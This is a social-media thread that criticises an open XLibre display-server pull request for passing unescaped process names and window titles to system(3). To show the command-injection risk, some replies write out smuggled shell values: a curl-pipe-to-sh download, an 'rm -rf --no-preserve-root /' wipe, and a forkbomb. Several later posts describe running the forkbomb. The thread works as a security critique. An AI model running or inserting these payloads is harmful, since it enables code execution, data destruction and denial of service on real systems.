this is truly incredible: https://github.com/X11Libre/xserver/pull/1627/files

they are using system(3) inside a security-critical domain (the display server).

but yes, sure, my refusal of xlibre on security grounds is the problem

@ariadne Holy crap

@ariadne
`system("which dialog > /dev/null 2>&1")`

that is just *chef's kiss*

@ariadne great goddess of the end, what the hell are they smoking??

@ariadne Quectel-tier code (Quectel EG25-G firmware used system(3) too). I don't think even metux would accept this PR, but he does seem to have reviewed it and didn't mention use of system(3) as a problem.

Edit: Originally this post said "Qualcomm" instead of "Quectel". I thought Quectel was owned by Qualcomm for some reason, but this appears to be untrue.

@ariadne

system("python3 /usr/bin/totally_secure_thing.py");

👍

@ariadne
breaking news: the x11 fork for chuds learning in realtime why it's useful to keep gay furries on your security team

@noisytoot system(3) should NEVER be used in a privileged security context, you can do all sorts of nasty things

@ariadne I know, Quectel's use of it resulted in CVE-2021-31698 (arbitrary code execution as root)

@ariadne oh my fucking god why are they doing it like that

@Dio9sys @ariadne (cry can't we have a managed x11 fork that keeps the gay furries involved? pretty please? Ill create it if we need it)

@erikarn @Dio9sys that is what #wayback is intended to provide

@ariadne from what I can tell they aren’t even properly escaping the process name, so a binary named e.g. ';curl virus|sh could execute arbitrary code, but I might be misreading it

@ariadne the x server for fascists is made by idiots. making it less secure in combination of being in a time where multiple desktops are completely abandoning the X Window System in favor of wayland. absolute cinema

@ariadne Not only that, appears (from a quick glance) to pass a window title into system, I think you could pop this from a browser window requesting screen sharing?:

https://github.com/X11Libre/xserver/pull/1627/files#diff-17ab6dac138c48f85820915df25942b72baf1acb51d289e2d2eacc6ed8f359b8R2287

then

https://github.com/X11Libre/xserver/pull/1627/files#diff-17ab6dac138c48f85820915df25942b72baf1acb51d289e2d2eacc6ed8f359b8R2293

then

https://github.com/X11Libre/xserver/pull/1627/files#diff-17ab6dac138c48f85820915df25942b72baf1acb51d289e2d2eacc6ed8f359b8R2316

@ariadne also why is it suddenly on github

@tauon hasn't it always been on github?

@ariadne which is….. less than ideal

@ariadne Am I reading this right? If the client controls its own process name it can write anything into 'text' which will eventually be expanded via %s in a format string which is passed to system? ​

@ariadne LOL

@ariadne i swear it was on some alternate forge for a while

@ariadne This honestly reads like an LLM PR

@ariadne Wait, so I just need to sneak in a binary named zenity to the front of the PATH to get it executed in an elevated security context?

@ariadne In an academic sense, how bad is this actually? Assuming that X11 is already up and running before anybody can log in (no LD_PRELOAD or ENV fuckery) and "which" is a root-owned binary.

@developing_agent there's a few different ways to exploit it

- if you can control PATH (or the binaries in the directories referenced by PATH), you can run whatever you want in an elevated context

- there is an unescaped %s format string passed directly to the dialog application, that %s is a window title

- probably other things i'm not thinking about right now

@ariadne @Dio9sys i mean i'm specifically asking about x11/xorg here because *waves hands* old hardware support too?

@erikarn @Dio9sys yes, we are working on enabling 2D-only compositing in wayback

@ariadne From the geniuses who brought you ‘trying to use ^ for exponentiation in C’

@ariadne Also… do they not know about xmessage?

But well of course it's all just yuck yuck yuck anyway.

@root my read too

@erikarn @Dio9sys @ariadne I mean come on guys, it might be silly but what is the danger? they're calling which

If you have a compromised version of which on your computer or in your PATH you're already boned. So this is a bit of an overreaction. We don't need to dork dunk on people all the time.

@ariadne @Dio9sys ooo links please!

@ariadne Yeah, the %s used to build the commands used by "system(command)" is definitely unsafe.

I'm having a hard time thinking how the constant string calls could be exploited though. (PATH should already be inherited from when X was started?)

I 100% expect there's someone with more knowledge of the deep magic that could exploit them, being as they're dragging in so much external state, but I dunno how.

@ariadne wow there's so many issues with that commit I don't even know where to start.

@ariadne Oh come on, *everything* needs to have a permission system built into it. It's for the children. And then I can take credit for it and brag about it.

@e_nomem @ariadne which (at least on... wherever I last read the manpage) doesn't start with PATH, annoyingly - it starts with some built-in paths like /bin for Some Fucking Reason.

(that doesn't excuse this very funny "security-feature", of course)

@erikarn @Dio9sys nothing to link yet, but someone gave a talk at XDC about their plans to build a generic 2D compositing library for non-GPU chips (e.g. old school accelerated VGA chips), which could be used as a backend for wlroots

@barometz The "security-feature" is just *chef's kiss*

I was actually thinking that, if the user is not legitimately using zenity, getting a binary named zenity _anywhere_ in the PATH is sufficient to pop the box since it's checked first.

That's putting aside a process that names itself something like "'; rm -rf --no-preserve-root /; echo"

@ariadne

@ariadne they should fully spell out "/usr/bin/which". Bam, fixed it.

@rotopenguin nah

@feld @Dio9sys @erikarn @ariadne There's at least one place where they're building commands using sprintf, with what at a cursory glance looks like "user-provided data", then simply call system(command) (line 660 in file shm.c, I suspect that client_name is under attacker control).

So, not guaranteed to be exploitable, but...

@vatine @feld@friedcheese.us @Dio9sys @erikarn

yes, this is not about using which at all. it is about the system(command) at line 660.

also there is xmessage(1) which is already part of the X11 distribution

@ariadne @erikarn @Dio9sys I admire Wayback for putting Wayland in the place where it makes sense and leaving the X11 protocol intact.

@e_nomem @barometz @ariadne I'm not sure how you'd do it though? Since $PATH is going to be inherited from whenever X started?

@developing_agent @e_nomem @barometz the real problem isn't the which stuff, it is the system(command) later that was generated using sprintf()

@vatine @feld @Dio9sys @erikarn @ariadne As the saying goes, even the biggest fool can create a security system he himself can see no problems in.

@ariadne @e_nomem @barometz Sure, absolutely.

@developing_agent Admittedly a load-bearing 'just' in my comment above. It's not necessarily easy to do for a malicious actor.

@barometz @ariadne

@e_nomem whoops my bad, misread that.

@ariadne I love that the main xlibre dev reviewed this and didn't spot the glaring issue

@ariadne and they copy-pasted identical code 3 times...?!???? 🙃

@ariadne system(), the gift that keeps on giving.

But the whole patch looks very wtf.

@ariadne promote code that makes you happy 😀

@ariadne The author's primary motivation seems to be bragging about it 🙃 https://github.com/X11Libre/xserver/pull/1627#discussion_r2609127512

@ariadne ngl I'd straight up forgotten that system(3) even existed since using it is such a bad idea

@ariadne
Holy shit I thought that was eradicated like almost 30 years ago.
For the love of God, Montressor!

@ariadne would guess that even CoPilot would not write this kind of stuff. But you never know… the real surprise is that this made it into a commit at all, was everybody sleeping?

@ariadne@treehouse.systems

• reads toot
• vague confusion
• man 3 system
• HOLY FORKING SHIRTBALLS

Yeah, that's baaaaad.

@ariadne @Dio9sys that's pretty neat looking.

Thing is, the SGI hardware i'm hacking on doesn't even expose a linear framebuffer. It ranges from "you get to blit things into the framebuffer, but you need to use DMA/PIO to read/write regions if you're not doing shapes" to "oh yeah i have a framebuffer but it's in like 32x32 or 64x64 tiles.

I'm filling in the missing ye olde acceleration stuff for the newport graphics x11 acceleration. It's tedious, but fun. No linear framebuffer.

@ariadne i feel like there's no good way to do what they're doing without the xserver drawing the prompt itself, or some sort of tight coupling with the wm/xcompositor

@ariadne which is what the portal->compositor<->pipewire dance is doing, and that's window system independent... what a joke

@ariadne calling this “security-feature” is insane 😭

@noisytoot any pointers? We had some in a service called qcmap which should be fixed. Is this what you are refereing to? @ariadne

@ariadne uuughhhhh! also, "which" isnt posix, you should use "command -v"

@Dio9sys @ariadne we need an x11 fork for woke

@haematophage it's called wayback

@Dio9sys im not installing wayland!!!!

@erikarn @Dio9sys @ariadne why do we need an X11 fork. wayland is the thing actually being maintained, the X11 chud fork literally only exists due to opportunism

@canacar @ariadne I was referring to https://blog.nns.ee/2021/04/03/modem-rce. I thought that Quectel was owned by Qualcomm for some reason, but it appears that it's not.

@erikarn @ariadne @Dio9sys any chance of @tde looking into wayback? it seems promising, possibly as an experimental branch or some sort of toggleable setting so TDE can use a display server that takes advantage of newer GPUs a bit better

@noisytoot thanks! Some of their modules do use Qualcomm chips, but I guess this is not one of those. @ariadne

@erikarn @ariadne @Dio9sys tes please!

(Not going to use Wayland. A few of the ways I use X are fundamentaly inimical to its base design concepts. But I do need a way to run Wayland programs (not entire sessions) under X.)

@andreaskem @ariadne
That's the more harmless part - a bit further down it's way more fun, there commands for zenity etc are built with `snprintf()` and string (%s) arguments like `client_name` or `window_name` - and also run with `system()`

@ariadne ok, so what? it's a fixed command string, no parameters are passed which could be escaped, if your `which` is compromised you are done for either way. I see nothing wrong with it.

@ariadne also i agree with inorton's comment

@gorplop so you think that this code will be okay when it encounters a process named " && (){ :|:&; }; :& ? why do you think that? just wondering.

@gorplop and if you think that is not possible, you may want to read about setprocname(3) and setproctitle(3).

@ariadne oh well, ok, that code sucks. Still, thats an open PR.

@gorplop an open PR which metux has reviewed but not rejected. the point is that there is not acceptable quality control in Xlibre given the privileged nature of display servers.

@gorplop @ariadne
scroll down to

https://github.com/X11Libre/xserver/pull/1627/files#diff-17ab6dac138c48f85820915df25942b72baf1acb51d289e2d2eacc6ed8f359b8R2307

@ariadne it's not merged, thats all i care for

@gorplop as this is a process and leadership problem, there are hundreds more which have been merged. many of which have been unmerged in upstream.

@noisytoot this is pretty typical vendor-grade code sadly, I've literally seen system("echo blah") to write output even.

there are quite a few reactionaries in my comments, some of which have been defederated in their entirety.

for the others:

1. although the system("which ...") use is silly, that isn't the problem here.

2. what do you think will happen when the code in this PR encounters a process named `" && :() { : | : & }; :&`? will it safely handle such a process name? before saying "that's impossible" please read setprocname(3), setproctitle(3), or in the case of Linux, understand that argv[0] is mutable.

3. yes, it is an open PR. it is also reflective of the code quality of many other PRs which have been merged to Xlibre already. how do you think that impacts its security record?

@ariadne what the actual fuck did i just read

@ariadne “Oh yeah? You enjoy security? You know what?” deletes your security

@ariadne

sure, my refusal of xlibre on security grounds is the problem

Even if there weren’t security problems, it should still be refused

@ariadne LMAOOO

no fucking way 😭

and yes, sometimes i post these things as bait to find out if we are missing alt-right reactionary servers that we need to defederate. it's like vaccines but for social media ❤️

vaccines are good btw

by the way, the ":() { : | : & }; :&" part earlier? that's a forkbomb. don't run it unless you want to deal with the consequences of running a forkbomb (in most cases, hard rebooting).

@ariadne In fact I've yet to find a system where you're not stuck with hard-rebooting in case of the shell fork-bomb.
Softer ones where it just spawns processes in a loop but stays open being much easier to deal with.

@lanodan if you ctrl-c immediately and then kill all shells, it should recover :)))

@ariadne Better go real fast on this one, at least I remember that trying to make killall do this was a lesson in futility because by the time it would have done it's loop over proc, others processes would have spawned.

@haematophage @Dio9sys
TLDR: X11 forks are going to run into problems,

Problem is, X11 as protocol has problems, which can't be (neatly) resolved without creating X12 which would need a compatibility layer for X11.
At this point developers decided to not carry the burden and started over.

Not to mention the Xorg code base and quirks. You can test developers on that. I would doubt devs not swearing like a sailor within minutes.

@gom @Dio9sys what are the problems with the protocol that cannot be resolved?

@ariadne Why is the X11 server a security boundary on your setup

Anything that has X11 access should be assumed to have at least the same privs as the user running the X11 server (which is hopefully just the regular user that owns the session)

NaziXorg X11Libre has a whole lot of other shit to laugh at it for

@ity so this code will be fine if it encounters a process named `(){ :|:& }; :&`?

@lanodan @ariadne I am half tempted to try on mine cuz I am pretty sure I will just hit the process ulimit and it will terminate gracefully when I close the parent process of all of them (the term em)

@ariadne I don't see how that's relevant to what I said

@ariadne Wait, they taste good? Why did nobody tell me afore?

@ity @ariadne they also introduced their own(bad) extension meant to introduce sandboxing, so clearly they want their software to be a security boundary

@ariadne I won a bet with a professor in university using this. He said there was no way my regular user account could bring down the system.

@ity @ariadne Closing the parent process won't have an effect, specially as it's backgrounded.
(Otherwise you'd have to use nohup, which doesn't looks as cryptic)

@Dio9sys @ariadne

https://github.com/X11Libre/xserver/pull/1627/files#diff-67816048c6b869748b1e3735d216be9434ca01ab286b63b8b32fc113119f0773R653-R673

That code, to pop up a "security alert". Irony is dead.

@lanodan @ariadne If I remember right, & does not reparent it to pid1, but rather to the session leader, which should get killed when the terminal emulator dies

But I should actually check, true. I will probably test in a VM. I have played around with it in a cgroup but yk.

@haematophage @Dio9sys
Colour format in X11 is 32bit (rgb+alpha, each 8bit). HDR won't work without redefining the colour format. 40bit with 10bit for each channel or 10bit rgb, 2bit alpha (wtf?!, but this was floated for XLibre)

Isolating applications, it's part of Wayland, but not part of X11 and Xorg. Xlibre introduced a namespace extension, providing optional security if this extension is used.
"Optional security" most of the time is equal to "no security, but warm feelings".. Just don't!

@Mae @ariadne oh right that happened, I forgot x3 Tbh whatever they want should be ignored (and so should their broken software)

I am mostly ignoring them atp, not worth my energy

@ity @ariadne i enjoy making fun of them

@ity at any rate, it is a security boundary because it mediates access to data between processes. they have also added their own extension to further mediate access to data between process. this extension is, like the X Security extension before it, comically bad.

also: please understand security fundamentals beyond that of simple UNIX user accounts

@ariadne Do you have any plans to share the list of alt-right servers that're good to defederate?

Asking for a me.

@ariadne I would say defining security boundary as "mediates IPC" is not really gonna match how most entities see it. It might match what X11Libre thinks, but def not what X.org thinks, and you are gonna have a really bad time expecting X.org Server to fulfill any expectations one would have of a security boundary.

As for "security fundamentals beyond Unix accounts", I don't see where A, you are getting from that I don't, and B, what do you mean to say.

Instead of assuming what I do or do not know, just state what you actually mean to say.

@ity @ariadne Yeah, & keeps it to the session leader, but you'd need a session leader which sends a SIGTERM/SIGKILL to it's process group before exiting, and I don't think any terminal emulator does that.

At least sending the kill to a process group would be more effective against a forkbomb than killall(1), but also more damaging. (But of course better than ultimately hard-rebooting)

@gom @Dio9sys

A) i am not a professional photographer and i imagine that very few linux users are, so compatibility with a colour format that is barely even implemented in industry-grade technology is at the bottom of my list of "things that need to be solved at any cost"

B) this is not a problem with the protocol, this is a way you would like things to operate so that you can have warm feelings. Wayland takes a steak knife and gives me a butter knife instead, because if somebody could walk in and stab me with a steak knife. When I point out that I like steak and lock my door, they tell me that if i really need to cut steak I should tell the butcher to add support for butter knives.

@lanodan @ariadne It has been a while since I worked on term-ems and shells

I would assume that while it doesn't SIGKILL, it ends up with the child dying, and iirc the term-em is the session leader, or the main interactive shell instance, both of which should end up dying

But atp I should just go read what *sh, some random term-em, and the kernel do, because I'm atm pulling it outta my ass as I forgot x3

@haematophage @Dio9sys
A) "It's not part of my use case and I doubt, that this interests a lot of people" is not how one should design a protocol.
On the other hand, proper screen and HDR videos is just nice and works with wayland without having "professional" needs.

B) What?

@gom @Dio9sys A) that's exactly how Wayland is designed, though. "We won't implement client side decorations because we don't want them". B) I'm sure you can understand how "Taking away the ability to do something because malicious actors could do bad things with it" applies in the case of application sandboxing. I know you're smart enough.

@ariadne See also

https://github.com/OpenRC/openrc/pull/790
and
my personal favorite: https://github.com/ggml-org/llama.cpp/pull/17646

@ariadne You're not like surprised by this I hope. 90% of Nazis are incompetent And Xlibre didn't get any of the actually dangerous ones

@haematophage @Dio9sys Really, I can't follow you.
CSD should work with wayland?! SSD is WIP (https://wayland.app/protocols/xdg-decoration-unstable-v1)

Framing properly defined data flows as "taking away". I just can't..

@gom @Dio9sys "why would you ever want to run a program that doesnt do things the way i think it should?? are you some kind of stupid person?"

@astraleureka why would anyone ever do that!? I can't believe they don't know about printf

@lanodan @ariadne

Just tried it here (ghostty in GNOME).

Noticeably slowed down the system. After a while it ran out of pids and the bashes started spewing error messages, and I could no longer open new terminals.

Closed the terminal tab and after a few seconds the user manager killed the rest of the cgroup, resolving the forkbomb. It ended up starting about 500000 processes before it got killed.

Ptyxis and GNOME Terminal behaved similarly.

@gom @Dio9sys "i dont understand, there's an unstable optional extension to the protocol that means some implementations can maybe do a thing you like, why are you not switching?" (edit: i notice i wrote the wrong thing, i meant server side decorations. i rewrote the sentence a couple times switching between "we're only implementing CSD because we think that's what you should want" and "we won't implement SSD because we don't want to" and clearly i did not make sure the whole sentence was oriented one way before hitting send)

@lanodan @ariadne

So I believe the reasons this was that the system manager limited my user to 73487 pids, and the user manager limited the terminal to 33403 pids. In the case of Ptyxis and GNOME Terminal, the tabs use separate scopes and each has the limit. ghostty uses custom sub-cgroups sharing the terminal's limit.

If I wasn't using a desktop environment that starts apps as user services, I think I still could have logged in as root and killed the forkbomb manually.

@gom

HDR is actually becoming increasingly used in gaming!

@aismallard i am increasingly feeling that sticking to x11 is fash-coded

@leo literally reactionary (clinging to a false past that never really existed)

@leo Speaking of which I need to stop being lazy and switch to wayland. I have some things set up but I just have been super putting it off

@ariadne the meta level irony here 👀

@Dio9sys @ariadne I mean at this point, we might as well put a gay trans furry directly on the X11 board of directors.

Oh wait @Lyude

@ariadne I think the bigger issue is the fact that, if I understand correctly, none of these labels are translatable

@TheEvilSkeleton i mean, accessibility seems important in a vista UAC-like feature, yes

@mos_8502 @ariadne you can evem bring down the whole hypervisor by running it in a VM.

@ariadne or replace the hardware. A student ran a forkbomb. The PC got hot and ran for a weekend with all fans at max. Week after: fan error. The fan controller, hard soldered to the main board, was faulty.

@ariadne To be fair, that's just a PR and hasn't been merged... But since the author is listed as a previous contributor, that's not inspiring confidence? :S

Also, to their credit, they added whitelist-based string sanitisation! For printing into their char text[1024]—C code like it's 1990 🤟

Looks also like two of the maintainers have said "no" to the PR.

@ariadne btw isn't this the guy also "maintaining" WinRing0? THAT actually spooks the living heck out of me.

@voidanix WinRingwhatnow?

@ariadne @voidanix it’s a hack/driver for allowing unprivileged programs to raccess hardware devices, like for example LED RGB raccontrol programs

@charlotte @voidanix i'm scared

@ariadne @gorplop I mean, the dude probably just skimmed through the PR and left only _one comment_, not a proper approval/rejection.

Anyone can put up PRs as bad as this one on other projects, but nobody goes running around saying stuff like "oh systemd has this open PR, this project is awful!". I get Xlibre is a meme but I'd rather look at merged code.

@ariadne oh no.

@ariadne @developing_agent wouldn't it just be more efficient to send them a comment on the pull request instead of posting on the Fediverse where they'll never see it though


edit: and who can control the X server's PATH except root?

@feld @developing_agent @ariadne Somehow, through some weird observation I cannot understand, I don't think that helping the PR author, or even notifying the PR author about that possibility was ever the intention of this thread.

No idea how I came to that conclusion though.

@phnt @feld @developing_agent @ariadne especially as this is a first time contributor to that repo, and the maintainers have already commented the same thoughts half a day ago

@i @phnt whoa whoa whoa did we just let facts into this thread? that seems dangerous

@lanodan @ariadne it can be made survivable in terminals which do a cgroup per shell – e.g. libvte in a systemd environment sets a tasks.max on each cgroup (capping it to like 10% or 33% of the system's global maximum from what I remember), so the rest of the system will stutter but keep more-or-less running.

(yes I have tried it, a while ago; did not try closing the window, but was able to 'systemctl --user kill' the whole tab from another tab.)

IIRC ghostty also has support for cgroups (also relying on systemd's API)... otherwise .profile could migrate self on shell startup, if something like openrc at least creates a per-user cgroup with unprivileged write access.

(in theory the terminal could also use the cgroup interfaces to either freeze or sigkill the entire cgroup at once without looping over pids/pgrps, but I don't think any terminal does that yet.)

@Dio9sys @gom yeah, framing HDR display support as some niche professional thing is weird. do you not like your movies looking better?

@ariadne my friend has a tattoo of this which i think is kinda cool

@ariadne (the fork bomb, not the xlibre PR)

@ariadne Setting aside the obvious security problems, would this even work?

It essentially has the X server block waiting for an X client to run and exit. And some of the prompt programs it might run appear to be ncurses text mode clients. Where are they going to display to?

@ariadne that has to be AI slop

@rootnode no doubt